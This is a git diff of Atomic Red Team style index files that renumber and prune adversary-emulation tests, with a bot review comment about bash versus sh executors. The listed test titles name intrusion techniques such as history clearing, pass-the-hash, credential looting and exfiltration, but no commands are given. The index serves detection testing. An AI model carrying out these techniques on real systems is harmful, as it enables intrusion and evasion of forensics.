-execution,T1059.004,Command and Scripting Interpreter: Bash,15,Detecting pipe-to-shell,fca246a8-a585-4f28-a2df-6495973976a1,bash
-execution,T1059.004,Command and Scripting Interpreter: Bash,16,Detecting pipe-to-shell (freebsd),1a06b1ec-0cca-49db-a222-3ebb6ef25632,sh
-execution,T1059.004,Command and Scripting Interpreter: Bash,17,Current kernel information enumeration,3a53734a-9e26-4f4b-ad15-059e767f5f14,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,10,Change login shell,c7ac59cb-13cc-4622-81dc-6d2fee9bfac7,bash
+execution,T1059.004,Command and Scripting Interpreter: Bash,11,Environment variable scripts,bdaebd56-368b-4970-a523-f905ff4a8a51,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,12,Detecting pipe-to-shell,fca246a8-a585-4f28-a2df-6495973976a1,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,13,Current kernel information enumeration,3a53734a-9e26-4f4b-ad15-059e767f5f14,sh
 execution,T1059.006,Command and Scripting Interpreter: Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
 execution,T1059.006,Command and Scripting Interpreter: Python,2,Execute Python via scripts,6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
 execution,T1059.006,Command and Scripting Interpreter: Python,3,Execute Python via Python executables,0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
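Review bot: "Environment variable scripts" (bdaebd56-…) and "Detecting pipe-to-shell" (fca246a8-…) switch executor from `bash` to `sh` in this hunk, but "Change login shell" (c7ac59cb-…) stays on `bash` even though its FreeBSD variant (33b68b9b-…) is removed alongside the others, which looks like an oversight if the intent is one portable test per technique. For the tests now declared `sh`, the command bodies must be POSIX-sh clean — on Debian/Ubuntu `/bin/sh` is dash, so bash-only constructs (`[[ ]]`, arrays, process substitution, `source`) would make the test fail before it produces the telemetry the detection is meant to exercise. The index cannot show the command text, so this needs verifying in the T1059.004 YAML rather than here; if "Change login shell" is meant to cover FreeBSD too, its executor should presumably follow the others to `sh`.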
@@ -429,11 +411,10 @@ impact,T1529,System Shutdown/Reboot,9,Shutdown System via `poweroff` - FreeBSD/L
 impact,T1529,System Shutdown/Reboot,10,Reboot System via `poweroff` - FreeBSD,5a282e50-86ff-438d-8cef-8ae01c9e62e1,sh
 impact,T1529,System Shutdown/Reboot,11,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash
 initial-access,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
-initial-access,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
-initial-access,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
-initial-access,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
-initial-access,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
-initial-access,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
+initial-access,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
+initial-access,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,"Exfiltrate data HTTPS using curl freebsd,linux or macos",4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
 exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
 exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv
index 43a55ee54..2e81276e3 100644
--- a/atomics/Indexes/Indexes-CSV/macos-index.csv
+++ b/atomics/Indexes/Indexes-CSV/macos-index.csv
@@ -29,11 +29,11 @@ defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Ma
 defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",17,Delete system log files using Applescript,e62f8694-cbc7-468f-862c-b10cd07e1757,sh
 defense-evasion,T1553.001,Subvert Trust Controls: Gatekeeper Bypass,1,Gatekeeper Bypass,fb3d46c6-9480-4803-8d7d-ce676e1f1a9b,sh
 defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,5,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,13,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,14,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding with Python,356dc0e8-684f-4428-bb94-9313998ad608,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
@@ -138,7 +138,7 @@ collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f05622
 collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
 collection,T1056.001,Input Capture: Keylogging,8,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
 collection,T1123,Audio Capture,3,using Quicktime Player,c7a0bb71-70ce-4a53-b115-881f241b795b,sh
-collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
+collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,sh
 collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
 collection,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
 collection,T1056.002,Input Capture: GUI Input Capture,3,AppleScript - Spoofing a credential prompt using osascript,b7037b89-947a-427a-ba29-e7e9f09bc045,bash
@@ -199,8 +199,8 @@ discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b67
 discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
 discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
 discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
-discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
-discovery,T1087.001,Account Discovery: Local Account,8,Enumerate users and groups,319e9f6c-7a9e-432e-8c62-9385c803b6f2,sh
+discovery,T1087.001,Account Discovery: Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
+discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,319e9f6c-7a9e-432e-8c62-9385c803b6f2,sh
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
 discovery,T1040,Network Sniffing,3,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
 discovery,T1040,Network Sniffing,8,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index dc14a6dcb..d864e2517 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -76,9 +76,9 @@ defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,9,Msiexec.exe -
 defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,10,Msiexec.exe - Execute the DllUnregisterServer function of a DLL,ab09ec85-4955-4f9c-b8e0-6851baf4d47f,command_prompt
 defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,11,Msiexec.exe - Execute Remote MSI file,44a4bedf-ffe3-452e-bee4-6925ab125662,command_prompt
 defense-evasion,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,17,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,18,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,19,Set Custom AddToHistoryHandler to Avoid History File Logging,1d0d9aa6-6111-4f89-927b-53e8afae7f94,powershell
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,10,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,12,Set Custom AddToHistoryHandler to Avoid History File Logging,1d0d9aa6-6111-4f89-927b-53e8afae7f94,powershell
 defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
 defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt
 defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
@@ -336,8 +336,8 @@ defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,4,Delete a si
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,7,Delete an entire folder - Windows PowerShell,edd779e4-a509-4cba-8dfa-a112543dbfb1,powershell
-defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,10,Delete Prefetch File,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
-defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,11,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
+defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,9,Delete Prefetch File,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
+defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
 defense-evasion,T1221,Template Injection,1,WINWORD Remote Template Injection,1489e08a-82c7-44ee-b769-51b72d03521d,command_prompt
 defense-evasion,T1550.002,Use Alternate Authentication Material: Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
 defense-evasion,T1550.002,Use Alternate Authentication Material: Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
@@ -808,7 +808,7 @@ collection,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e
 collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
 collection,T1123,Audio Capture,2,Registry artefact when application use microphone,7a21cce2-6ada-4f7c-afd9-e1e9c481e44a,command_prompt
 collection,T1074.001,Data Staged: Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
-collection,T1074.001,Data Staged: Local Data Staging,4,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
+collection,T1074.001,Data Staged: Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
 collection,T1114.001,Email Collection: Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
 collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt
 collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell
@@ -999,9 +999,9 @@ discovery,T1087.002,Account Discovery: Domain Account,19,Suspicious LAPS Attribu
 discovery,T1087.002,Account Discovery: Domain Account,20,Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope,ffbcfd62-15d6-4989-a21a-80bfc8e58bb5,powershell
 discovery,T1087.002,Account Discovery: Domain Account,21,Suspicious LAPS Attributes Query with adfind all properties,abf00f6c-9983-4d9a-afbc-6b1c6c6448e1,powershell
 discovery,T1087.002,Account Discovery: Domain Account,22,Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd,51a98f96-0269-4e09-a10f-e307779a8b05,powershell
-discovery,T1087.001,Account Discovery: Local Account,9,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
-discovery,T1087.001,Account Discovery: Local Account,10,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
-discovery,T1087.001,Account Discovery: Local Account,11,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
+discovery,T1087.001,Account Discovery: Local Account,8,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
+discovery,T1087.001,Account Discovery: Local Account,9,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
+discovery,T1087.001,Account Discovery: Local Account,10,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,5,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
 discovery,T1069.002,Permission Groups Discovery: Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 18017eae6..9b5f4763f 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -184,24 +184,17 @@
 - T1600.001 Reduce Key Space [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
 - Atomic Test #1: Clear Bash history (rm) [linux, macos]
- - Atomic Test #2: Clear sh history (rm) [linux]
- - Atomic Test #3: Clear Bash history (echo) [linux]
- - Atomic Test #4: Clear sh history (echo) [linux]
- - Atomic Test #5: Clear Bash history (cat dev/null) [linux, macos]
- - Atomic Test #6: Clear sh history (cat dev/null) [linux]
- - Atomic Test #7: Clear Bash history (ln dev/null) [linux, macos]
- - Atomic Test #8: Clear sh history (ln dev/null) [linux]
- - Atomic Test #9: Clear Bash history (truncate) [linux]
- - Atomic Test #10: Clear sh history (truncate) [linux]
- - Atomic Test #11: Clear history of a bunch of shells [linux, macos]
- - Atomic Test #12: Clear history of a bunch of shells (freebsd) [linux]
- - Atomic Test #13: Clear and Disable Bash History Logging [linux, macos]
- - Atomic Test #14: Use Space Before Command to Avoid Logging to History [linux, macos]
- - Atomic Test #15: Disable Bash History Logging with SSH -T [linux]
- - Atomic Test #16: Disable sh History Logging with SSH -T (freebsd) [linux]
- - Atomic Test #17: Prevent Powershell History Logging [windows]
- - Atomic Test #18: Clear Powershell History by Deleting History File [windows]
- - Atomic Test #19: Set Custom AddToHistoryHandler to Avoid History File Logging [windows]
+ - Atomic Test #2: Clear Bash history (echo) [linux]
+ - Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos]
+ - Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos]
+ - Atomic Test #5: Clear Bash history (truncate) [linux]
+ - Atomic Test #6: Clear history of a bunch of shells [linux, macos]
+ - Atomic Test #7: Clear and Disable Bash History Logging [linux, macos]
+ - Atomic Test #8: Use Space Before Command to Avoid Logging to History [linux, macos]
+ - Atomic Test #9: Disable Bash History Logging with SSH -T [linux]
+ - Atomic Test #10: Prevent Powershell History Logging [windows]
+ - Atomic Test #11: Clear Powershell History by Deleting History File [windows]
+ - Atomic Test #12: Set Custom AddToHistoryHandler to Avoid History File Logging [windows]
 - [T1202 Indirect Command Execution](../../T1202/T1202.md)
 - Atomic Test #1: Indirect Command Execution - pcalua.exe [windows]
 - Atomic Test #2: Indirect Command Execution - forfiles.exe [windows]
@@ -715,9 +708,8 @@
 - Atomic Test #6: Delete a single file - Windows PowerShell [windows]
 - Atomic Test #7: Delete an entire folder - Windows PowerShell [windows]
 - Atomic Test #8: Delete Filesystem - Linux [linux]
- - Atomic Test #9: Delete Filesystem - FreeBSD [linux]
- - Atomic Test #10: Delete Prefetch File [windows]
- - Atomic Test #11: Delete TeamViewer Log Files [windows]
+ - Atomic Test #9: Delete Prefetch File [windows]
+ - Atomic Test #10: Delete TeamViewer Log Files [windows]
 - T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1221 Template Injection](../../T1221/T1221.md)
 - Atomic Test #1: WINWORD Remote Template Injection [windows]
@@ -797,11 +789,10 @@
 - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
 - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 - Atomic Test #8: Create local account (Linux) [linux]
- - Atomic Test #9: Create local account (FreeBSD) [linux]
- - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
- - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
- - Atomic Test #12: Login as nobody (Linux) [linux]
- - Atomic Test #13: Login as nobody (freebsd) [linux]
+ - Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
+ - Atomic Test #10: Reactivate a locked/expired account (FreeBSD) [linux]
+ - Atomic Test #11: Login as nobody (Linux) [linux]
+ - Atomic Test #12: Login as nobody (freebsd) [linux]
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1127 Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md)
 - Atomic Test #1: Lolbin Jsc.exe compile javascript to exe [windows]
@@ -1187,11 +1178,10 @@
 - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
 - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 - Atomic Test #8: Create local account (Linux) [linux]
- - Atomic Test #9: Create local account (FreeBSD) [linux]
- - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
- - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
- - Atomic Test #12: Login as nobody (Linux) [linux]
- - Atomic Test #13: Login as nobody (freebsd) [linux]
+ - Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
+ - Atomic Test #10: Reactivate a locked/expired account (FreeBSD) [linux]
+ - Atomic Test #11: Login as nobody (Linux) [linux]
+ - Atomic Test #12: Login as nobody (freebsd) [linux]
 - [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
 - Atomic Test #1: User scope COR_PROFILER [windows]
 - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -1324,14 +1314,10 @@
 - Atomic Test #7: What shells are available [linux]
 - Atomic Test #8: Command line scripts [linux]
 - Atomic Test #9: Obfuscated command line scripts [linux]
- - Atomic Test #10: Obfuscated command line scripts (freebsd) [linux]
- - Atomic Test #11: Change login shell [linux]
- - Atomic Test #12: Change login shell (freebsd) [linux]
- - Atomic Test #13: Environment variable scripts [linux]
- - Atomic Test #14: Environment variable scripts (freebsd) [linux]
- - Atomic Test #15: Detecting pipe-to-shell [linux]
- - Atomic Test #16: Detecting pipe-to-shell (freebsd) [linux]
- - Atomic Test #17: Current kernel information enumeration [linux]
+ - Atomic Test #10: Change login shell [linux]
+ - Atomic Test #11: Environment variable scripts [linux]
+ - Atomic Test #12: Detecting pipe-to-shell [linux]
+ - Atomic Test #13: Current kernel information enumeration [linux]
 - [T1559 Inter-Process Communication](../../T1559/T1559.md)
 - Atomic Test #1: Cobalt Strike Artifact Kit pipe [windows]
 - Atomic Test #2: Cobalt Strike Lateral Movement (psexec_psh) pipe [windows]
@@ -1764,11 +1750,10 @@
 - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
 - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 - Atomic Test #8: Create local account (Linux) [linux]
- - Atomic Test #9: Create local account (FreeBSD) [linux]
- - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
- - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
- - Atomic Test #12: Login as nobody (Linux) [linux]
- - Atomic Test #13: Login as nobody (freebsd) [linux]
+ - Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
+ - Atomic Test #10: Reactivate a locked/expired account (FreeBSD) [linux]
+ - Atomic Test #11: Login as nobody (Linux) [linux]
+ - Atomic Test #12: Login as nobody (freebsd) [linux]
 - [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
 - Atomic Test #1: User scope COR_PROFILER [windows]
 - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -1829,9 +1814,8 @@
 - [T1090.003 Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md)
 - Atomic Test #1: Psiphon [windows]
 - Atomic Test #2: Tor Proxy Usage - Windows [windows]
- - Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu [linux]
+ - Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu/FreeBSD [linux]
 - Atomic Test #4: Tor Proxy Usage - MacOS [macos]
- - Atomic Test #5: Tor Proxy Usage - FreeBSD [linux]
 - T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1571 Non-Standard Port](../../T1571/T1571.md)
 - Atomic Test #1: Testing usage of uncommonly used port with PowerShell [windows]
@@ -1936,8 +1920,7 @@ - [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) - Atomic Test #1: Stage data from Discovery.bat [windows] - Atomic Test #2: Stage data from Discovery.sh [linux, macos] - - Atomic Test #3: Stage data from Discovery.sh (freebsd) [linux] - - Atomic Test #4: Zip a Folder with PowerShell for Staging in Temp [windows] + - Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows] - [T1114.001 Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) - Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows] - [T1119 Automated Collection](../../T1119/T1119.md) @@ -2371,12 +2354,11 @@ - Atomic Test #3: View accounts with UID 0 [linux, macos] - Atomic Test #4: List opened files by user [linux, macos] - Atomic Test #5: Show if a user account has ever logged in remotely [linux] - - Atomic Test #6: Show if a user account has ever logged in remotely (freebsd) [linux] - - Atomic Test #7: Enumerate users and groups [linux, macos] - - Atomic Test #8: Enumerate users and groups [macos] - - Atomic Test #9: Enumerate all accounts on Windows (Local) [windows] - - Atomic Test #10: Enumerate all accounts via PowerShell (Local) [windows] - - Atomic Test #11: Enumerate logged on users via CMD (Local) [windows] + - Atomic Test #6: Enumerate users and groups [linux, macos] + - Atomic Test #7: Enumerate users and groups [macos] + - Atomic Test #8: Enumerate all accounts on Windows (Local) [windows] + - Atomic Test #9: Enumerate all accounts via PowerShell (Local) [windows] + - Atomic Test #10: Enumerate logged on users via CMD (Local) [windows] - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) - Atomic Test #1: Detect Virtualization Environment (Linux) [linux] - Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux] 
@@ -2843,11 +2825,10 @@ - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows] - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows] - Atomic Test #8: Create local account (Linux) [linux] - - Atomic Test #9: Create local account (FreeBSD) [linux] - - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux] - - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux] - - Atomic Test #12: Login as nobody (Linux) [linux] - - Atomic Test #13: Login as nobody (freebsd) [linux] + - Atomic Test #9: Reactivate a locked/expired account (Linux) [linux] + - Atomic Test #10: Reactivate a locked/expired account (FreeBSD) [linux] + - Atomic Test #11: Login as nobody (Linux) [linux] + - Atomic Test #12: Login as nobody (freebsd) [linux] # exfiltration - T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 9065addbb..abecd954a 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md 
@@ -62,21 +62,14 @@ - T1070.007 Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) - Atomic Test #1: Clear Bash history (rm) [linux, macos] - - Atomic Test #2: Clear sh history (rm) [linux] - - Atomic Test #3: Clear Bash history (echo) [linux] - - Atomic Test #4: Clear sh history (echo) [linux] - - Atomic Test #5: Clear Bash history (cat dev/null) [linux, macos] - - Atomic Test #6: Clear sh history (cat dev/null) [linux] - - Atomic Test #7: Clear Bash history (ln dev/null) [linux, macos] - - Atomic Test #8: Clear sh history (ln dev/null) [linux] - - Atomic Test #9: Clear Bash history (truncate) [linux] - - Atomic Test #10: Clear sh history (truncate) [linux] - - Atomic Test #11: Clear history of a bunch of shells [linux, macos] - - Atomic Test #12: Clear history of a bunch of shells (freebsd) [linux] - - Atomic Test #13: Clear and Disable Bash History Logging [linux, macos] - - Atomic Test #14: Use Space Before Command to Avoid Logging to History [linux, macos] - - Atomic Test #15: Disable Bash History Logging with SSH -T [linux] - - Atomic Test #16: Disable sh History Logging with SSH -T (freebsd) [linux] + - Atomic Test #2: Clear Bash history (echo) [linux] + - Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos] + - Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos] + - Atomic Test #5: Clear Bash history (truncate) [linux] + - Atomic Test #6: Clear history of a bunch of shells [linux, 